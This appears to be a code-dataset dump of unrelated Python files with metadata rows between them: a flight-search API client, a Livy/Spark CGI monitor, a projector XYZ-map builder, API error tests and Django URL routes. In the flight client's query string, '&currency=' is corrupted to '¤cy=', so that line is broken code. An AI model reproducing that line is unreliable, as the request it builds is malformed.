self._logger = logging.getLogger(__name__ + "." + self.__class__.__name__)
@property
def currencies(self):
if self._currencies is None:
response = self._get(f"reference/v1.0/currencies")
if response.status_code != 200:
self._logger.warning(f"Request failed with status {response.status_code}")
return []
json = response.json()
self._currencies = [
Currency.from_json(currency_json)
for currency_json in json.get("Currencies", [])
]
return self._currencies
@property
def countries(self):
response = self._get(f"reference/v1.0/countries/{self._locale}")
if response.status_code != 200:
return []
json = response.json()
return [
Country.from_json(country_json)
for country_json in json.get("Countries", [])
]
def _get(self, url: str, params: dict = None):
if params is None:
params = {}
return requests.get(f"{API_ADDRESS}/{url}", headers=self._get_headers, params=params)
def _post(self, url: str, params: dict = None, data: str = ""):
if params is None:
params = {}
return requests.post(
f"{API_ADDRESS}/{url}", headers=self._post_headers
, params=params, data=data
)
def get_airports(self, keyword):
response = self._get(
f"autosuggest/v1.0/{self._country}/{self._currency}/{self._locale}/"
, params={"query": f"{keyword}"}
)
if response.status_code != 200:
return []
response_json = response.json()
return [
Airport.from_json(airport_json)
for airport_json in response_json.get("Places", [])
]
def get_flights(
self, departure_date: datetime, departure_id: str
, arrival_date: datetime, arrival_id: str
, cabin_class: CabinClass = None
, adults: int = 1, children: int = 0
, infants: int = 0, stops: int = None
, duration_mins: int = None, number_results: int = 10
, sort_type: SortType = None, sort_order: SortOrder = SortOrder.ASCENDING
) -> List[Itinerary]:
params = \
f"inboundDate={arrival_date.strftime(PARAM_DATE_FORMATTING)}" \
f"&country={self._country}¤cy={self._currency}" \
f"&locale={self._locale}&originPlace={departure_id}-sky&destinationPlace={arrival_id}-sky" \
f"&outboundDate={departure_date.strftime(PARAM_DATE_FORMATTING)}" \
f"&adults={adults}&children={children}&infants={infants}"
if cabin_class:
params += f"&cabinClass={cabin_class.value}"
self._logger.debug(f"Creating session with parameters {params}")
response = self._post("pricing/v1.0", data=params)
if response.status_code != 201:
return []
_, url = response.headers["Location"].split("/apiservices/")
params = {"pageIndex": "0", "pageSize": f"{number_results}"}
if duration_mins:
params["duration"] = f"{duration_mins}"
if stops:
params["stops"] = f"{stops}"
if sort_type:
params["sortType"] = f"{sort_type.value}"
params["sortOrder"] = f"{sort_order.value}"
self._logger.debug("Polling session")
response = self._get(url, params)
if response.status_code != 200:
return []
return self._extract_itineraries(response.json())
def _extract_itineraries(self, response_json) -> List[Itinerary]:
currencies = [
Currency.from_json(json_dict)
for json_dict in response_json.get("Currencies", [])
]
id_places = {
json_dict["Id"]: Place.from_json(json_dict)
for json_dict in response_json.get("Places", [])
}
id_agents = {
json_dict["Id"]: Agent.from_json(json_dict)
for json_dict in response_json.get("Agents", [])
}
id_carriers = {
json_dict["Id"]: Carrier.from_json(json_dict)
for json_dict in response_json.get("Carriers", [])
}
id_segments = {}
for json_dict in response_json.get("Segments", []):
id_ = json_dict["Id"]
departure_place = id_places[json_dict["OriginStation"]]
departure_time = datetime.strptime(json_dict["DepartureDateTime"], JSON_DATE_FORMATTING)
arrival_place = id_places[json_dict["DestinationStation"]]
arrival_time = datetime.strptime(json_dict["ArrivalDateTime"], JSON_DATE_FORMATTING)
carrier = id_carriers[json_dict["Carrier"]]
operating_carrier = id_carriers[json_dict["OperatingCarrier"]]
duration = timedelta(minutes=json_dict["Duration"])
flight_number = json_dict["FlightNumber"]
trip_type = json_dict["JourneyMode"]
direction = Direction.OUTBOUND if json_dict["Directionality"] == "Outbound" else Direction.INBOUND
id_segments[id_] = Segment(
id_, departure_place, departure_time, arrival_place, arrival_time,
carrier, operating_carrier, duration, flight_number, trip_type, direction
)
id_trips = {}
for json_dict in response_json.get("Legs", []):
id_ = json_dict["Id"]
segments = [
id_segments[segment_id]
for segment_id in json_dict.get("SegmentIds", [])
]
departure_place = id_places[json_dict["OriginStation"]]
departure_date = datetime.strptime(json_dict["Departure"], JSON_DATE_FORMATTING)
arrival_place = id_places[json_dict["DestinationStation"]]
arrival_date = datetime.strptime(json_dict["Arrival"], JSON_DATE_FORMATTING)
duration = timedelta(minutes=json_dict["Duration"])
stops = [
id_places[place_id]
for place_id in json_dict.get("Stops", [])
]
carriers = [
id_carriers[carrier_id]
for carrier_id in json_dict.get("Carriers", [])
]
operating_carriers = [
id_carriers[carrier_id]
for carrier_id in json_dict.get("Carriers", [])
]
direction = Direction.OUTBOUND if json_dict["Directionality"] == "Outbound" else Direction.INBOUND
id_trips[id_] = Trip(
id_, segments, departure_place, departure_date, arrival_place, arrival_date
, duration, stops, carriers, operating_carriers, direction
)
itineraries = []
for json_dict in response_json.get("Itineraries", []):
outbound_trip = id_trips[json_dict["OutboundLegId"]]
inbound_trip = id_trips[json_dict["InboundLegId"]]
prices = []
for price_dict in json_dict.get("PricingOptions", []):
agents = [id_agents[agent_id] for agent_id in price_dict["Agents"]]
quote_age = timedelta(minutes=price_dict["QuoteAgeInMinutes"])
price = price_dict["Price"]
url = price_dict["DeeplinkUrl"]
prices.append(Price(agents, quote_age, price, url))
itineraries.append(Itinerary(outbound_trip, inbound_trip, prices))
return itineraries
def get_flights_ranges(
self, departure_dates: List[datetime], departure_ids: List[str]
, arrival_dates: List[datetime], arrival_ids: List[str]
, *args, rate_limit_per_min: int = 40, **kwargs
) -> List[Itinerary]:
itineraries = []
# The time in between calls is multiplied by two because two requests are made to get flights
in_between_call_s = (60 / rate_limit_per_min) * 2
combinations = list(product(departure_dates, departure_ids, arrival_dates, arrival_ids))
nb_combinations = len(combinations)
for index, (departure_date, departure_id, arrival_date, arrival_id) in enumerate(combinations):
self._logger.debug(f"Getting itineraries {index} out of {nb_combinations}")
start_time = time.time()
itineraries.extend(
self.get_flights(departure_date, departure_id, arrival_date, arrival_id, *args, **kwargs)
)
time.sleep(max([0, in_between_call_s - (time.time() - start_time)]))
return itineraries
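# Hedged usage sketch (the API key and airport codes are placeholders):
# if __name__ == "__main__":
#     browser = FlightBrowser(api_key="YOUR_RAPIDAPI_KEY")
#     itineraries = browser.get_flights(
#         datetime(2020, 3, 1), "YYZ", datetime(2020, 3, 10), "CDG")
#     for itinerary in itineraries[:5]:
#         print(itinerary)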
| 42.1
| 120
| 0.597387
| 1,137
| 10,104
| 5.065963
| 0.218997
| 0.054167
| 0.019444
| 0.023611
| 0.322396
| 0.267882
| 0.210764
| 0.174653
| 0.133333
| 0.133333
| 0
| 0.005215
| 0.278899
| 10,104
| 239
| 121
| 42.276151
| 0.785342
| 0.009006
| 0
| 0.198068
| 0
| 0
| 0.175607
| 0.063131
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.038647
| 0
| 0.149758
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e675b79e0383d49ce47e747d971a54a4f4b735e
| 8,636
|
py
|
Python
|
python/monitor.py
|
ChrisArnault/fink_data_monitor
|
3ef3167204711222fb71d6d6f828bce4094ad21a
|
[
"Apache-2.0"
] | null | null | null |
python/monitor.py
|
ChrisArnault/fink_data_monitor
|
3ef3167204711222fb71d6d6f828bce4094ad21a
|
[
"Apache-2.0"
] | 8
|
2019-03-30T13:27:46.000Z
|
2019-06-05T13:55:26.000Z
|
python/monitor.py
|
ChrisArnault/fink_data_monitor
|
3ef3167204711222fb71d6d6f828bce4094ad21a
|
[
"Apache-2.0"
] | 1
|
2019-03-22T12:38:32.000Z
|
2019-03-22T12:38:32.000Z
|
#!/usr/bin/python
# coding: utf-8
# Copyright 2018 AstroLab Software
# Author: Chris Arnault
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Dataset monitor
This is the client part.
The monitor.py script has to be present on the <host> machine
where the minimal HTML server has been activated as
> python server.py
Then open the following URL in a web browser:
http://<host>:24701/monitor.py
"""
import cgi
from pylivy.session import *
from pylivy.client import *
from variables import HTMLVariableSet
# ======================================================
LIVY_URL = "http://vm-75222.lal.in2p3.fr:21111"
form = cgi.FieldStorage()
print("Content-type: text/html; charset=utf-8\n")
client = LivyClient(LIVY_URL)
# init data
html = HTMLVariableSet(["started",
"simul",
"change_simul",
"livy_session",
"waiting_session",
"waiting_statement",
"livy_statement",
"kill_session"],
["new_statement", "result"])
url = "/monitor.py"
method = "POST"
# ======================================================
def html_header():
"""
Global & common html header. SHould be used everywhere
Returns:
--------
out: str
"""
return """
<!DOCTYPE html>
<head>
<link rel="stylesheet" type="text/css" href="css/finkstyle.css">
<title>Mon programme test</title>
</head>
<body>
<div class="hero-image">
<div class="hero-text">
<h1 style="font-size:50px">Fink</h1>
<h3>Alert dataset monitor</h3>
<div class="topnav"> """
def html_trailer():
"""
Global & common html trailer. SHould be used everywhere
Returns:
--------
out: str
"""
return """
</div>
<p>© AstroLab Software 2018-2019</p>
</div>
</div>
</body>
</html>
"""
def html_manage_simulation_mode(out: str) -> str:
# manage Livy simulation
will_change_simul = html.change_simul.is_set()
print("<br>change simul = {}".format(will_change_simul))
html.change_simul.reset()
if will_change_simul:
if html.simul.is_set():
out += """<form action="{}" method="{}">""".format(url, method)
out += """
<br> Currently using real Livy"""
html.simul.reset()
out += html.to_form()
out += """<button type="submit">Simul Livy</button>
</form>
"""
else:
out += """<form action="{}" method="{}">""".format(url, method)
out += """
<br> Currently simulate Livy """
html.simul.set(1)
out += html.to_form()
out += """<button type="submit">Use real Livy</button>
</form>
"""
else:
if html.simul.is_set():
out += """<form action="{}" method="{}">""".format(url, method)
out += """
<br> Currently simulate Livy """
html.change_simul.set(1)
out += html.to_form()
out += """
<button type="submit">Use real Livy</button>
</form>
"""
else:
out += """<form action="{}" method="{}">""".format(url, method)
out += """
<br> Currently using real Livy"""
html.change_simul.set(1)
out += html.to_form()
out += """
<button type="submit">Simul Livy</button>
</form>
"""
# out += html.debug()
html.change_simul.reset()
return out
# Read all HTML POST variables
html.read(form)
if not html.started.is_set():
# Handle the very first launch to set the default
html.simul.set(1)
html.started.set(1)
# ======================================================
# the start of the WEB page
# ======================================================
out = html_header()
out = html_manage_simulation_mode(out)
# out += html.debug()
# Manage Livy session & Spark statements
out += """<form action="{}" method="{}">""".format(url, method)
if html.simul.is_set():
if html.waiting_session.above(5):
print("<br> session is now idle")
html.waiting_session.reset()
html.waiting_statement.reset()
html.livy_statement.reset()
html.livy_session.set(1)
if html.waiting_statement.above(5):
print("<br> statement just finished")
html.waiting_session.reset()
html.waiting_statement.reset()
html.livy_statement.incr()
# debugging
# print("<br>")
# print("Keys = [", ",".join(form.keys()), "]")
# print(html.debug())
"""
Command interface
- select Livy simulation
- open session & wait for idle
- start statement & wait for completion
"""
if html.kill_session.is_set():
session_id = html.livy_session.value
try:
client.delete_session(session_id)
except:
print("error killing session ", session_id)
html.livy_session.reset()
html.waiting_session.reset()
html.kill_session.reset()
if html.livy_session.is_set():
# statement management
if not html.waiting_statement.is_set():
out += """<br>session is idle: we may start a statement<br>"""
html.waiting_statement.set(0)
out += html.to_form()
out += """
Enter a Spark statement
<input type="text" name="new_statement" value="{}" />
<input type="text" name="result" value="{}" />
<button type="submit">Run</button>
""".format(html.new_statement.value, html.result.value)
else:
out += """<br>session is idle, we do wait a statement to complete<br>"""
html.waiting_statement.incr()
s = client.get_session(html.livy_session.value)
if not html.livy_statement.is_set():
st = client.create_statement(s.session_id, html.new_statement.value)
html.livy_statement.set(st.statement_id)
else:
st = client.get_statement(s.session_id, html.livy_statement.value)
if st.state == StatementState.AVAILABLE:
html.waiting_statement.reset()
html.result.set(st.output.text)
print("<br>", html.result.value)
html.livy_statement.reset()
out += html.to_form()
out += """<button type="submit">waiting statement to complete</button>"""
else:
# session management
if not html.waiting_session.is_set():
out += """<br>No session<br>"""
html.waiting_session.set(0)
# print(html.waiting_session.debug())
html.waiting_statement.reset()
out += html.to_form()
out += """<button type="submit">Open a session</button>"""
else:
# we have requested a new session thus waiting_session is set
if html.simul.is_set():
html.waiting_session.incr()
else:
if not html.livy_session.is_set():
print("Create a session ")
s = client.create_session(SessionKind.PYSPARK)
print("<br> session {} <br>".format(s.session_id))
html.livy_session.set(s.session_id)
# we test if the session is already idle
s = client.get_session(html.livy_session.value)
if s.state == SessionState.IDLE:
print("<br> session is now idle")
html.waiting_session.reset()
html.waiting_statement.reset()
html.livy_statement.reset()
html.new_statement.reset()
out += """<br>Waiting session to become idle<br>"""
out += html.to_form()
out += """<button type="submit">waiting session</button>"""
out += """</form>"""
if html.livy_session.is_set():
out += """<form action="{}" method="{}">""".format(url, method)
html.kill_session.set(1)
out += html.to_form()
out += """
<button type="submit">Delete the session</button>
</form>
"""
out += html_trailer()
print(out)
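# Note on the control flow above (an assumption based on html.read(form) and
# the html.to_form() calls): every button submits the whole HTMLVariableSet as
# hidden form fields, so the script is stateless between CGI invocations and
# all state round-trips through the browser.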
| 28.50165
| 81
| 0.559287
| 1,013
| 8,636
| 4.661402
| 0.24383
| 0.041931
| 0.017154
| 0.024778
| 0.371453
| 0.286955
| 0.257518
| 0.250318
| 0.232952
| 0.197374
| 0
| 0.008476
| 0.275938
| 8,636
| 302
| 82
| 28.596026
| 0.746682
| 0.201135
| 0
| 0.430168
| 0
| 0
| 0.317011
| 0.018718
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01676
| false
| 0
| 0.022346
| 0
| 0.055866
| 0.055866
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e687cbd3bdfdf17c399fa781c8f96210ee0138e
| 8,457
|
py
|
Python
|
python/src/buildXyzMapCommand.py
|
kylemcdonald/LightLeaks
|
f72719c4f46e4ec0cf8f37b520f7be859381d43b
|
[
"MIT"
] | 57
|
2015-01-06T13:07:04.000Z
|
2022-03-26T04:05:50.000Z
|
python/src/buildXyzMapCommand.py
|
kylemcdonald/LightLeaks
|
f72719c4f46e4ec0cf8f37b520f7be859381d43b
|
[
"MIT"
] | 34
|
2015-01-01T21:18:50.000Z
|
2021-09-02T16:28:10.000Z
|
python/src/buildXyzMapCommand.py
|
kylemcdonald/LightLeaks
|
f72719c4f46e4ec0cf8f37b520f7be859381d43b
|
[
"MIT"
] | 11
|
2015-02-23T18:56:22.000Z
|
2020-07-19T07:50:11.000Z
|
import click
import json
import os
import re
from tqdm import tqdm
from utils.imutil import *
import numpy as np
import math
PROCESSED_SCAN_FOLDER = 'processedScan'
def buildXyzMap(data_dir, prefix):
projector_size = get_projector_size(data_dir)
click.echo("Projector resolution %i x %i (from settings.json)" %
(projector_size[0], projector_size[1]))
if not os.path.exists(os.path.join(data_dir, 'mask-0.png')):
click.secho(
f'Error: Projector mask not found at path {os.path.join(data_dir, "mask-0.png")}', err=True, fg='red')
return
scan_folders = sorted(
[f for f in os.listdir(data_dir) if re.match('^'+prefix, f)])
scan_folders = list(filter(lambda x: os.path.isdir(
os.path.join(data_dir, x, PROCESSED_SCAN_FOLDER)), scan_folders))
if len(scan_folders) == 0:
click.secho(
f"No scans found {data_dir} with prefix {prefix}", err=True, fg="red")
return
deduped = None
for i, folder in tqdm(enumerate(scan_folders), total=len(scan_folders)):
tqdm.write(folder + f": Loading processed scan")
processed_path = os.path.join(data_dir, folder, PROCESSED_SCAN_FOLDER)
cam_confidence = imread(os.path.join(
processed_path, 'camConfidence.exr'))
cam_binary_map = np.load(os.path.join(processed_path, 'camBinary.npy'))
cam_width = cam_confidence.shape[1]
cam_height = cam_confidence.shape[0]
# tqdm.write(f"{folder}: Camera size {cam_width}x{cam_height}")
# Load binary file from camamok
cam_xyz_map = np.fromfile(os.path.join(
data_dir, folder, 'camamok', 'xyzMap.raw'), np.float32)
# Determine the scale factor of the binary file (probably 4, if the code hasn't changed in camamok)
scale_factor = math.floor(
1/math.sqrt((len(cam_xyz_map) / 4) / (cam_width * cam_height)))
tqdm.write(folder + f": upscaling xyz map by {scale_factor}")
# Reshape camamok xyz map
cam_xyz_map = cam_xyz_map.reshape(
int(cam_height / scale_factor), int(cam_width / scale_factor), 4)[:, :, 0:3]
cam_xyz_map = upsample(cam_xyz_map, scale=scale_factor)
tqdm.write(folder + f": xyz map size {cam_xyz_map.shape}")
# tqdm.write(f'{folder}: cam xyz minimum: {np.min(cam_xyz_map)}, max: {np.max(cam_xyz_map)}')
assert len(cam_confidence) > 0
assert len(cam_binary_map) > 0
assert len(cam_xyz_map) > 0
tqdm.write(folder + f": Packing data")
packed = pack_maps(cam_confidence, cam_binary_map,
cam_xyz_map, i, projector_size)
tqdm.write(
f'{folder}: Packed {packed.shape[0]:,} pixels. Removing duplicate pixels')
if deduped is not None:
# print('deduped before:', deduped.shape)
packed = np.vstack((packed, deduped))
# print('packed after:', packed.shape)
deduped = dedupe(packed)
tqdm.write(
f'{folder}: {deduped.shape[0]:,} pixels in deduplicated stack')
click.echo("Done processing scanes. Unpacking projector map")
projector_xyz, projector_confidence, cam_index_map, cam_pixel_index = unpack_maps(
deduped, projector_size)
cam_index_map_colored = np.copy(cam_index_map)
cam_index_map_colored[projector_confidence < 0.1] = -1
cam_index_map_colored = cam_index_map_colored * \
255 / (cam_index_map.max()+1)
cam_index_map_colored = cv2.applyColorMap(
cam_index_map_colored.astype(np.uint8), cv2.COLORMAP_JET)
# imshow(cam_index_map_colored, fmt='jpg')
# Store result
debug_out_path = os.path.join(data_dir, 'BuildXYZ')
if not os.path.exists(debug_out_path):
os.makedirs(debug_out_path)
projector_mask = imread(os.path.join(
data_dir, 'mask-0.png')).mean(axis=2) / 255
projector_confidence_masked = projector_confidence * \
projector_mask[:, :, np.newaxis]
imwrite(os.path.join(debug_out_path, 'confidenceMap-0.exr'),
projector_confidence_masked.astype(np.float32))
imwrite(os.path.join(debug_out_path, 'xyzMap-0.exr'),
projector_xyz.astype(np.float32))
imwrite(os.path.join(debug_out_path, 'camIndexMap.png'), cam_index_map)
imwrite(os.path.join(debug_out_path, 'camIndexMapColored.png'),
cam_index_map_colored)
with open(os.path.join(debug_out_path, "BuildXYZOutput.txt"), "w") as text_file:
def t(text):
text_file.write("%s\n" % text)
click.echo(text)
t("Scans used:")
for s in scan_folders:
t("\t%s" % s)
t("Resolution: %ix%i" % (projector_size[0], projector_size[1]))
threshold = 0.05
t("\nCoverage (threshold %.2f):" % threshold)
masked_camIndexMap = np.copy(cam_index_map)
masked_camIndexMap[projector_confidence < threshold] = -1
u, c = np.unique(masked_camIndexMap, return_counts=True)
for _u, _c in zip(u, c):
if _u != -1:
t("\tScan %i (%s): %.2f%% (%i)" %
(_u, scan_folders[int(_u)], 100*_c / sum(c), _c))
else:
t("\tNo scan: %.2f%% (%i)" % (100*_c / sum(c), _c))
def get_projector_size(data_dir):
with open(os.path.join(data_dir, 'settings.json')) as json_file:
data = json.load(json_file)
proj_width = data['projectors'][0]['width']
proj_height = data['projectors'][0]['height']
return proj_width, proj_height
def overflow_fix(cam_binary_map, proj_size):
cam_binary_map[(cam_binary_map[:, 0] >= proj_size[0]) | (
cam_binary_map[:, 1] >= proj_size[1])] = [0, 0]
# rows, cols = camHeight, camWidth
# confidence.shape: rows, cols (float)
# cam_binary_map.shape: rows, cols, 2 (int)
# cam_xyz_map.shape: rows, cols, 3 (float)
# cam_index: int
def pack_maps(confidence, cam_binary_map, cam_xyz_map, cam_index, proj_size):
""" Pack camera confidence, cam binary projector map and camera xyz map """
# prepare confidence_flat
confidence_flat = confidence.reshape(-1, 1)
# prepare cam_binary_mapFlat
cam_binary_map_flat = cam_binary_map.reshape((-1, 2))
overflow_fix(cam_binary_map_flat, proj_size)
cam_binary_map_flat = np.ravel_multi_index(cam_binary_map_flat.transpose()[
::-1], (proj_size[1], proj_size[0])).reshape(-1, 1)
# prepare cam_xyz_map_flat
# scale = len(cam_binary_map) / len(cam_xyz_map)
cam_xyz_map_flat = cam_xyz_map.reshape(-1, 3)
# DEBUG STUFF
# Pack camera index into array
cam_index_flat = np.full((cam_xyz_map_flat.shape[0], 1), cam_index)
# Cam Pixel Index
cam_pixel_index = np.arange(cam_xyz_map_flat.shape[0])[:, np.newaxis]
# stack and return everything in shape: (rows x cols), 7
return np.hstack((confidence_flat, cam_binary_map_flat, cam_xyz_map_flat, cam_index_flat, cam_pixel_index))
def dedupe(packed):
# get indices sorted by confidence, use ::-1 to put max confidence first
packedSortedIndices = packed[:, 0].argsort()[::-1]
packedSorted = packed[packedSortedIndices]
# get unique packedSorted indices
_, indices = np.unique(packedSorted.transpose()[1], return_index=True)
return packedSorted[indices]
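# Illustrative example of dedupe (hypothetical values): if two packed rows
# share projector-pixel code 42 with confidences 0.9 and 0.4, sorting by
# confidence descending and keeping the first occurrence of each code
# retains only the 0.9 row.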
def unpack_maps(packed, proj_size):
""" Unpack projector xyz map and projector confidence """
proj_width = proj_size[0]
proj_height = proj_size[1]
projector_xyz = np.zeros((proj_height, proj_width, 3))
projector_confidence = np.zeros((proj_height, proj_width, 1))
cam_index = np.full((proj_height, proj_width, 1), -1)
cam_pixel_index = np.zeros((proj_height, proj_width, 1))
# assign xyzMap values using proMapFlat indices
# packed[:,0] contains confidence value
# packed[:,1] contains binary code (projector pixel coordinate)
# packed[:,2:5] contains xyz coordinate
# packed[:,5] contains camera index (debug)
# packed[:,6] contains camera pixel index (debug)
proMapFlat = packed[:, 1].astype(np.int32)
projector_confidence.reshape(-1)[proMapFlat] = packed[:, 0]
projector_xyz.reshape(-1, 3)[proMapFlat] = packed[:, 2:5]
# DEBUG STUFF
cam_index.reshape(-1)[proMapFlat] = packed[:, 5]
cam_pixel_index.reshape(-1)[proMapFlat] = packed[:, 6].astype(np.uint64)
return projector_xyz, projector_confidence, cam_index, cam_pixel_index
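# Hedged usage sketch (the path and prefix are hypothetical): buildXyzMap
# expects a data directory containing settings.json, mask-0.png and one
# folder per scan matching the prefix, e.g.
#   buildXyzMap('/data/lightleaks', 'scan')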
| 38.793578
| 114
| 0.653541
| 1,182
| 8,457
| 4.432318
| 0.192047
| 0.028631
| 0.034358
| 0.021378
| 0.244131
| 0.127505
| 0.064325
| 0.031113
| 0.016797
| 0.016797
| 0
| 0.017294
| 0.220527
| 8,457
| 217
| 115
| 38.97235
| 0.777458
| 0.159513
| 0
| 0.044444
| 0
| 0.007407
| 0.11281
| 0.006369
| 0
| 0
| 0
| 0
| 0.022222
| 1
| 0.051852
| false
| 0
| 0.059259
| 0
| 0.155556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e698f12281208ec9285a26a2656c4de0a23f99f
| 3,383
|
py
|
Python
|
api/tests/test_bad_queries.py
|
jpclark6/datalake
|
d9dceabe889f55ce589494fae5d00a27985e8088
|
[
"Apache-2.0"
] | 2
|
2016-12-11T18:00:08.000Z
|
2017-12-26T22:47:15.000Z
|
api/tests/test_bad_queries.py
|
jpclark6/datalake
|
d9dceabe889f55ce589494fae5d00a27985e8088
|
[
"Apache-2.0"
] | 10
|
2015-09-24T00:32:55.000Z
|
2017-09-14T02:15:53.000Z
|
api/tests/test_bad_queries.py
|
jpclark6/datalake
|
d9dceabe889f55ce589494fae5d00a27985e8088
|
[
"Apache-2.0"
] | 2
|
2016-12-21T16:49:47.000Z
|
2019-02-24T23:58:11.000Z
|
# Copyright 2015 Planet Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import simplejson as json
import base64
def get_bad_request(client, params):
uri = '/v0/archive/files/'
q = '&'.join(['{}={}'.format(k, v) for k, v in params.iteritems()])
if q:
uri += '?' + q
res = client.get(uri)
assert res.status_code == 400
response = json.loads(res.get_data())
assert 'code' in response
assert 'message' in response
return response
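# Each test below drives get_bad_request with a deliberately malformed query
# and asserts on the machine-readable error code returned by the API.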
def test_no_parameters(client):
res = get_bad_request(client, {})
assert res['code'] == 'NoArgs'
def test_no_what_parameter(client):
res = get_bad_request(client, {'start': 123})
assert res['code'] == 'NoWhat'
def test_no_work_id_or_interval(client):
res = get_bad_request(client, {'what': 'syslog'})
assert res['code'] == 'NoWorkInterval'
def test_work_id_and_start(client):
params = {
'what': 'syslog',
'work_id': 'work123',
'start': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_work_id_and_end(client):
params = {
'what': 'syslog',
'work_id': 'work123',
'end': 345
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_start_without_end(client):
params = {
'what': 'syslog',
'start': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_end_without_start(client):
params = {
'what': 'syslog',
'end': 345
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_invalid_start(client):
params = {
'what': 'syslog',
'start': 'notaninteger',
'end': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidTime'
def test_invalid_end(client):
params = {
'what': 'syslog',
'end': 'notaninteger',
'start': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidTime'
def test_start_after_end(client):
params = {
'what': 'syslog',
'end': 100,
'start': 200,
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_invalid_cursor(client):
params = {
'what': 'syslog',
'start': 100,
'end': 200,
'cursor': 'foobar',
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidCursor'
def test_bad_cursor_valid_json(client):
cursor = base64.b64encode(b'{"valid": "json", "invalid": "cursor"}')
params = {
'what': 'syslog',
'start': 100,
'end': 200,
'cursor': cursor,
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidCursor'
| 24.875
| 79
| 0.617204
| 413
| 3,383
| 4.893462
| 0.300242
| 0.106878
| 0.083622
| 0.122217
| 0.516576
| 0.443345
| 0.374072
| 0.339436
| 0.30381
| 0.30381
| 0
| 0.024638
| 0.244162
| 3,383
| 135
| 80
| 25.059259
| 0.765741
| 0.164056
| 0
| 0.494737
| 0
| 0
| 0.185501
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.136842
| false
| 0
| 0.021053
| 0
| 0.168421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e69ba962e4d092d4863d5beb5b0972723e70fc5
| 936
|
py
|
Python
|
books/urls.py
|
ravenda900/bookshop-django
|
d66308a75c69854d55f8093aa8d35d4940cb5689
|
[
"MIT"
] | null | null | null |
books/urls.py
|
ravenda900/bookshop-django
|
d66308a75c69854d55f8093aa8d35d4940cb5689
|
[
"MIT"
] | null | null | null |
books/urls.py
|
ravenda900/bookshop-django
|
d66308a75c69854d55f8093aa8d35d4940cb5689
|
[
"MIT"
] | null | null | null |
from django.urls import path, include
from . import views
urlpatterns = [
path('', views.home, name="home"),
path('signup', views.signup, name="signup"),
path('activate/<uidb64>/<token>/', views.activate_account, name='activate'),
path('sell-book', views.sell_book, name='sell_book'),
path('book/<int:id>/detail', views.book_detail, name='book_detail'),
path('add-balance', views.add_balance, name='add_balance'),
path('books-for-sale', views.books_for_sale, name='books_for_sale'),
path('purchased-books', views.purchased_books, name='purchased_books'),
path('profile/<str:username>', views.profile, name='profile'),
path('cart-items', views.cart_items, name='cart_items'),
path('add-items-to-cart/<int:book_item>', views.add_items_to_cart, name="add_items_to_cart"),
path('cancel-items', views.cancel_items, name="cancel_items"),
path('checkout', views.checkout, name='checkout')
]
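# Example (illustrative): path('book/<int:id>/detail', ...) resolves a request
# for /book/42/detail to views.book_detail(request, id=42).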
| 52
| 97
| 0.698718
| 130
| 936
| 4.846154
| 0.269231
| 0.038095
| 0.057143
| 0.066667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002404
| 0.111111
| 936
| 18
| 98
| 52
| 0.754808
| 0
| 0
| 0
| 0
| 0
| 0.339381
| 0.086446
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.117647
| 0
| 0.117647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e6d433ebfb2152c9c032a7b2793db23253d6dbb
| 10,464
|
py
|
Python
|
Scripts/Genetic Algorithm Optimizations/gazebo_walk_ga.py
|
Bittu96/humanoid
|
